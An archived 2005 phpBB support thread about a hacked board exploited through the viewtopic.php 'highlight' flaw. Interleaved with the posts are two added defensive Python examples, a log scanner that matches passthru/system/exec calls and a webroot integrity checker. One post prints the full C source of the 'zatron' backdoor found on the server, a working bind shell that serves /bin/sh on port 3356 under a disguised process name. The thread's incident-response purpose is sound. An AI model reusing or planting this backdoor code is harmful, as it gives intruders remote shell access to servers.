phpbb attacked again - zatron passthru!

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

phpbb attacked again - zatron passthru!

Post by mes »

Getting annoyed now! Had phpbb running for a couple of years now, then about 2 weeks ago got an iframe exploit throughout my site because of it.

I in turn installed phpbb 2.0.11 again, thinking this version will be solid.

Then about 15 mins ago my board went down and I got a message from my host saying,

It has been noticed that your site is vulnerable and has been exploited as a result by using the "passthru" option.

Your board needs to be removed and reconfigured with a new version.

How can I do this when I already had the latest version installed?

By the way, I found 2 suspicious files in my phpbb/ directory (zatron.c and another zatron file) coded by Bronc Buster.

Any ideas/help would be much appreciated..

Thanks Guys

mes
espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom »

Wipe the website directories and reinstall, because you've got files left over from the original compromise.
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

Does this include wiping all my HTML? Can I just wipe the phpbb files?

The thing is I have wiped the files before, but it has just come back again.

cheers guys

mes
espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom »

The file you're talking about causing the problem (zatron) isn't a PHP file, so I'd say you need to AT LEAST replace all the PHP and template files with known-good ones, and review all other files in the directory to make sure you know what they are.
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

I have removed everything before. I'm thinking that maybe my web host is running an old version of PHP (apparently); maybe this is causing the problem. My server is clean of unknown files; they always just appear in phpbb.

Oh well :-)

mes
jmbb
Registered User
Posts: 52
Joined: Wed Feb 02, 2005 5:29 pm

Post by jmbb »

That's it. That's all I needed to know. I'm changing to vbulletin now.
espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom »

This is strange, but I suspect that you're running into vulnerabilities based upon file permissions.

Our PHPBB boards were under attack for over a month before we found out about the problem, and no compromise occurred, because the attacks required lax file ownerships and permissions and access to programs that shouldn't be accessible to the web server user. We patched them, anyway.

Others that have all the patches in place still experience compromises. I guess paranoia is a good thing? :)
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

jmbb wrote: That's it. That's all I needed to know. I'm changing to vbulletin now.
I think before you act, you need to find all of the details first ... This may well be a case of the host having an old PHP version, and has absolutely nothing to do with phpBB.

mes: I can't find anything regarding exploits in passthru at the moment. Do you have Apache access logs or IIS access logs (or whichever webserver your host uses)?

Edit: This appears to be from the highlight exploit, and nothing new. Did you patch phpBB or did you do a fresh install (keeping your database intact)?
Proven Offensive Security Expertise. OSCP - GXPN
TMAN22
Registered User
Posts: 7
Joined: Wed Feb 02, 2005 8:47 pm

Post by TMAN22 »

Our board was attacked by NeverEverSanity - some sort of virus - it looked like DoS with so many requests per second. The attackers were requesting viewtopic.php?highlight= (system commands which our linux box was immune to). The problem was that these requests corrupted the phpbb session table and made the whole forum inaccessible with "Critical Error". Also, the CPU usage hit the roof, like 98% being used by the http server.

After many crashes within a few minutes I checked the http log file and found most requests had viewtopic.php?highlight=

I added the following lines to the viewtopic file and the cpu usage went back to normal right away:

if ($highlight)
{
$length = strlen($highlight);
if ($length > 15)
exit;
}

By the way, we patched the "highlight" vulnerability before, and these lines caused the script to end prematurely.

After our forum went back to normal, I investigated more about the attack and I came across news articles that said the code was a virus that gets potential victims through googling "viewtopic.php".

phpbb guys said the problem is with php and php guys said nope, it is with phpbb: http://www.php.net/security-note.php
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

TMAN22 wrote: Our board was attacked by NeverEverSanity - some sort of virus - it looked like DoS with so many requests per second. The attackers were requesting viewtopic.php?highlight= (system commands which our linux box was immune to). The problem was that these requests corrupted the phpbb session table and made the whole forum inaccessible with "Critical Error". Also, the CPU usage hit the roof, like 98% being used by the http server.

After many crashes within a few minutes I checked the http log file and found most requests had viewtopic.php?highlight=

I added the following lines to the viewtopic file and the cpu usage went back to normal right away:

if ($highlight)
{
$length = strlen($highlight);
if ($length > 15)
exit;
}

By the way, we patched the "highlight" vulnerability before, and these lines caused the script to end prematurely.

After our forum went back to normal, I investigated more about the attack and I came across news articles that said the code was a virus that gets potential victims through googling "viewtopic.php".

phpbb guys said the problem is with php and php guys said nope, it is with phpbb: http://www.php.net/security-note.php
Yes, we know all about that notice that php.net posted ... Take note of my edit. ;) I edited it before you posted your reply, long before. However ... there are vulnerabilities in PHP that exist in versions prior to 4.3.10 that have been exploited. In fact, there is exploit code floating around that is used to exploit the vulnerability that is in PHP using phpBB ...

And your "fix" above can cause some problems. I can still execute commands on your board that are under that limit. ;) What you need to do is use code that searches for the exploit string, and not the length of the request. One particular example comes to mind.

Code:

0000  00 e0 7d 8a 07 11 00 a0 c9 af bb 7f 08 00 45 00   ..}...........E.
0010  08 1c ff d7 00 00 80 01 e8 aa c0 a8 64 1e c0 a8   ............d...
0020  64 ef 00 00 bd d5 02 00 04 00 ff d8 ff fe 00 08   d...............
0030  57 41 4e 47 32 02 ff e0 00 10 4a 46 49 46 00 01   WANG2.....JFIF..
0040  01 01 00 60 00 60 00 00 ff db 00 43 00 10 0b 0c   ...`.`.....C....
0050  0e 0c 0a 10 0e 0d 0e 12 11 10 13 18 28 1a 18 16   ............(...
0060  16 18 31 23 25 1d 28 3a 33 3d 3c 39 33 38 37 40   ..1#%.(:3=<9387@
0070  48 5c 4e 40 44 57 45 37 38 50 6d 51 57 5f 62 67   H\N@DWE78PmQW_bg
[...cut...]
07f0  a7 fe 8c 6a cd f1 35 9d ee 91 af 47 e2 4d 36 06   ...j..5....G.M6.
0800  99 16 32 2f 23 0c 46 54 60 64 f3 9e 98 e8 30 36   ..2/#.FT`d....06
0810  64 d0 04 77 7e 35 3a bd ac 96 3e 1f b1 bc 92 f6   d..w~5:...>.....
0820  61 b0 33 28 5f 2d 4f 05 b2 ac                     a.3(_-O...
Now, if you had the full packet (which is much longer than that), it would be detected by Intrusion Detection Systems as a large ICMP packet. It would be detected as such as it is possible for a variety of attacks to hide in a large ICMP packet, for reasons that I will not go into here. However, do you know what the above packet is? It is a jpeg of the Microsoft logo. It turns out that when a client connects to a domain controller, data is sent back and forth, one set of which contains GPO information, and for some reason or another, Microsoft sends its logo in the communication. Perfectly valid, but it is correctly considered a large ICMP packet. However, if you block that, you block correct logging in to a domain, and thus deny access to the client, and perhaps screw some things up in the process.
Last edited by Techie-Micheal on Wed Feb 02, 2005 11:21 pm, edited 1 time in total.
Proven Offensive Security Expertise. OSCP - GXPN
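TMAN22's guard keys on the length of the highlight value, and Techie-Micheal's reply makes the point that the content of the value, not its length, is what matters. The script below is an added example, not code from this thread, from TMAN22, or from phpBB: it applies that idea to the Apache access logs Techie-Micheal asked mes for, flagging viewtopic.php requests whose highlight parameter contains a call to a PHP command-execution function or characters that no honest search term contains. The log format (Apache common/combined), the allowed character set, the list of function names, the three-round percent-decoding and every log line in it are my assumptions and constructed data, not something taken from the thread.

```python
"""Added example (not from this thread and not phpBB code): triage an Apache
access log for viewtopic.php requests whose `highlight` parameter does not
look like a search term.  Judge the content of the value, never its length.
All log lines below are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# PHP functions that hand a string to the OS shell.  The host's notice named
# "passthru"; the rest are PHP's sibling command-execution functions.
COMMAND_FUNCTIONS = ("passthru", "system", "exec", "shell_exec", "popen")
# Only a *call* (name followed by an opening parenthesis) is flagged; matching
# the bare word would flag an honest search for "file system".
CALL_RE = re.compile(r"\b(" + "|".join(COMMAND_FUNCTIONS) + r")\s*\(", re.IGNORECASE)
# Assumption: a search term is word characters, spaces, '+', '-' and the '*'
# wildcard.  Quotes, dots, parentheses and semicolons do not belong in one.
SEARCH_TERM_RE = re.compile(r"^[\w +\-*]*$")
# Apache common/combined prefix: client ident user [time] "METHOD target proto" status
LOG_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log: one double-encoded call, one 2-character hostile
# value that a length check would wave through, and three honest searches.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Feb/2005:20:15:01 -0600] "GET /phpBB2/viewtopic.php?t=1234&highlight=backup+restore HTTP/1.1" 200 18211
192.0.2.77 - - [02/Feb/2005:20:15:02 -0600] "GET /phpBB2/viewtopic.php?t=1234&highlight=%2527.passthru%2528 HTTP/1.0" 200 18211
192.0.2.77 - - [02/Feb/2005:20:15:03 -0600] "GET /phpBB2/viewtopic.php?t=1234&highlight=%27%29 HTTP/1.0" 200 18211
192.0.2.20 - - [02/Feb/2005:20:15:05 -0600] "GET /phpBB2/viewtopic.php?t=99&highlight=file+system HTTP/1.1" 200 12004
192.0.2.21 - - [02/Feb/2005:20:15:06 -0600] "GET /phpBB2/viewtopic.php?t=99&highlight=supercalifragilisticexpialidocious HTTP/1.1" 200 12004
192.0.2.33 - - [02/Feb/2005:20:15:07 -0600] "GET /phpBB2/index.php HTTP/1.1" 200 9021
"""

def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded value
    is judged on what the PHP script would finally see.  Assumption: three
    rounds covers any honest client."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def highlight_is_suspicious(raw_value):
    """Return a reason string when the highlight value does not look like a
    search term, or None when it does.  A 2-character value can be hostile and
    a 34-character word can be honest, so length is never consulted."""
    value = decode_fully(raw_value)
    call = CALL_RE.search(value)
    if call:
        return f"contains a call to '{call.group(1).lower()}'"
    if not SEARCH_TERM_RE.match(value):
        bad = "".join(sorted({c for c in value if not SEARCH_TERM_RE.match(c)}))
        return f"unexpected characters in search term: {bad}"
    return None

def scan_access_log(lines):
    """Return (client_ip, decoded_highlight, reason) for every viewtopic.php hit
    whose highlight parameter fails the check above."""
    findings = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/viewtopic.php"):
            continue
        # parse_qs percent-decodes once and turns '+' into a space, as the
        # web server / PHP does before the script sees the value.
        for raw in parse_qs(url.query, keep_blank_values=True).get("highlight", []):
            reason = highlight_is_suspicious(raw)
            if reason:
                findings.append((ip, decode_fully(raw), reason))
    return findings

if __name__ == "__main__":
    for ip, value, reason in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{ip}\thighlight={value!r}\t{reason}")
```

Run against the sample, only the two requests from 192.0.2.77 are reported; the 34-character honest search and the search for "file system" pass, which is exactly the distinction a length cut-off cannot make. To use it on a real log, pass the file's lines to scan_access_log and review the reported client addresses and values by hand.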
TMAN22
Registered User
Posts: 7
Joined: Wed Feb 02, 2005 8:47 pm

Post by TMAN22 »

Thanx mike - and I really appreciate what you guys are doing for the open source community :)
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

TMAN22 wrote: Thanx mike - and I really appreciate what you guys are doing for the open source community :)
No problem. :)
Proven Offensive Security Expertise. OSCP - GXPN
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

Not sure about Apache access logs or IIS access logs.

We use www.123-reg.co.uk for hosting and access via myserverworld.com administered by pipex.

Basically they are saying don't use phpbb, but I like phpbb and am used to it; never had any problems like this before.

The only info I have is : It has been noticed that your site is vulnerable and has been exploited as a result by using the "passthru" option.

If that means anything to anyone I'm not sure, but we're keeping the board down for the time being.

It was a fresh install of phpbb 2.0.11 on a database from a previous installation.

Cheers,

mes
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

This is the code of one of the zatron files that we found within the phpbb root. If this is of any use to anyone :)

mes

Code:

#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h>
#define P 3356
#define HIDE "http"

#define SH "/bin/sh"
#define LISTN 5

int main(int argc, char **argv)
{

/* welcome mesg */
char *fst = "\nConnected!\n\n";
char *sec = "This fine tool coded by Bronc Buster\n";
char *thr = "Please enter each command followed by ';'\n";

int outsock, insock, sz;

/* set up two structs for in and out */
struct sockaddr_in home;
struct sockaddr_in away;
/* set port, proto and bzero for BIND */
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);

/* changing the name that will appear */
strcpy(argv[0],HIDE);

/* catch the SIG */
signal(SIGCHLD,SIG_IGN);

/* here we go! */
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0)
  exit(printf("Socket error\n"));

if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0))
  exit(printf("Bind error\n"));

if((listen(outsock,LISTN))<0)
  exit(printf("Listen error\n"));

sz=sizeof(struct sockaddr_in);
if(fork()) 
	 exit(0);

/* infinate loop - wait for accept*/
for(;;)
  {
  if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0)
    exit(printf("Accept error"));
  if(fork() !=0)
    {
    send(insock,fst,strlen(fst),0); /* send out welcome mesg */
    send(insock,sec,strlen(sec),0);
    send(insock,thr,strlen(thr),0);
    dup2(insock,0); /* open stdin  */
    dup2(insock,1); /* open stdout */
    dup2(insock,2); /* open stderr */
    execl(SH,SH,(char *)0); /* start our shell */
    close(insock);
    exit(0); /* all done, leave and close sock */
    }
  close(insock);
  }
}
TMAN22
Registered User
Posts: 7
Joined: Wed Feb 02, 2005 8:47 pm

Post by TMAN22 »

Hi mes,

It looks like a backdoor through port 3356. Use a firewall, or replace it with another script that will notify you about the intrusion and all the commands they try to execute.

Google the author of the script and you'll see he is a hacker with an alt2000 email account.
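espicom's advice earlier in the thread (replace the PHP and template files with known-good copies and check every other file in the directory) and TMAN22's identification of the zatron file as a backdoor both come down to the same job: knowing exactly what is in the webroot and spotting what should not be there. The script below is an added example, not code from this thread, from espicom or TMAN22, or from phpBB. It hashes a pristine, freshly unpacked copy into a manifest, compares the live phpbb/ directory against it, and separately flags any ELF binary or C source under the root, since neither belongs in a PHP application's document root. The manifest format, the exclusion of config.php (assumed to hold per-site database settings and so to differ legitimately), and the sample directory tree are my assumptions and constructed data; the two dropped files are stand-ins named after the ones mes found, not the real files.

```python
"""Added example (not from this thread and not phpBB code): compare a live
phpBB webroot with a hash manifest taken from a known-good copy, and flag
files that never belong under a document root.  Sample tree is constructed."""
import hashlib
import os
import tempfile

ELF_MAGIC = b"\x7fELF"                   # first four bytes of every ELF executable
SOURCE_EXTENSIONS = (".c", ".o", ".so")  # no place in a PHP application's webroot
# Assumption: config.php carries per-site database settings and so legitimately
# differs from the pristine copy; it is excluded from the comparison.
IGNORE = {"config.php"}

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def walk_files(root):
    """All regular files under root as sorted '/'-separated relative paths."""
    rels = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rels.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(rels)

def build_manifest(pristine_root):
    """{relative_path: sha256} for a freshly unpacked, untouched phpBB copy."""
    return {rel: sha256_of(os.path.join(pristine_root, rel))
            for rel in walk_files(pristine_root) if rel not in IGNORE}

def is_elf(path):
    with open(path, "rb") as f:
        return f.read(4) == ELF_MAGIC

def triage_webroot(live_root, manifest):
    """Classify every file of the live tree against the manifest."""
    report = {"modified": [], "unexpected": [], "missing": [], "binaries": [], "source_files": []}
    live = [rel for rel in walk_files(live_root) if rel not in IGNORE]
    for rel in live:
        full = os.path.join(live_root, rel)
        if rel not in manifest:
            report["unexpected"].append(rel)       # not shipped by phpBB: who put it there?
        elif sha256_of(full) != manifest[rel]:
            report["modified"].append(rel)         # shipped file, but its content changed
        if is_elf(full):
            report["binaries"].append(rel)         # compiled program inside the webroot
        if rel.lower().endswith(SOURCE_EXTENSIONS):
            report["source_files"].append(rel)     # e.g. a dropped .c file
    report["missing"] = sorted(set(manifest) - set(live))
    return report

def make_sample_tree():
    """Constructed data: a pristine copy, and a live copy where viewtopic.php was
    altered and two files named like the ones found in this thread appeared."""
    pristine = tempfile.mkdtemp(prefix="phpbb-pristine-")
    live = tempfile.mkdtemp(prefix="phpbb-live-")
    shipped = {
        "viewtopic.php": b"<?php\n// stand-in for the shipped viewtopic.php\n",
        "index.php": b"<?php\n// stand-in for the shipped index.php\n",
        "config.php": b"<?php\n$dbhost = 'localhost';\n",
        "templates/subSilver/overall_header.tpl": b"<html>\n",
    }
    for root in (pristine, live):
        for rel, body in shipped.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(body)
    with open(os.path.join(live, "config.php"), "wb") as f:     # site-specific, must not be reported
        f.write(b"<?php\n$dbhost = 'db.example.net';\n")
    with open(os.path.join(live, "viewtopic.php"), "ab") as f:  # tampered shipped file
        f.write(b"// line appended by someone else\n")
    with open(os.path.join(live, "zatron.c"), "wb") as f:       # dropped C source (placeholder text)
        f.write(b"/* placeholder, not the real file */\n")
    with open(os.path.join(live, "zatron"), "wb") as f:         # dropped ELF binary (header bytes only)
        f.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9)
    return pristine, live

if __name__ == "__main__":
    pristine, live = make_sample_tree()
    for kind, paths in triage_webroot(live, build_manifest(pristine)).items():
        print(f"{kind:12} {paths}")
```

On the sample tree the report lists viewtopic.php as modified, zatron and zatron.c as unexpected, zatron as an ELF binary and zatron.c as a source file, while the differing config.php is silent. For a real board, build the manifest from an archive downloaded from phpbb.com, not from the server, and treat anything in "unexpected" or "binaries" as a reason to wipe and reinstall rather than to delete the one file, since mes's experience shows the files came back.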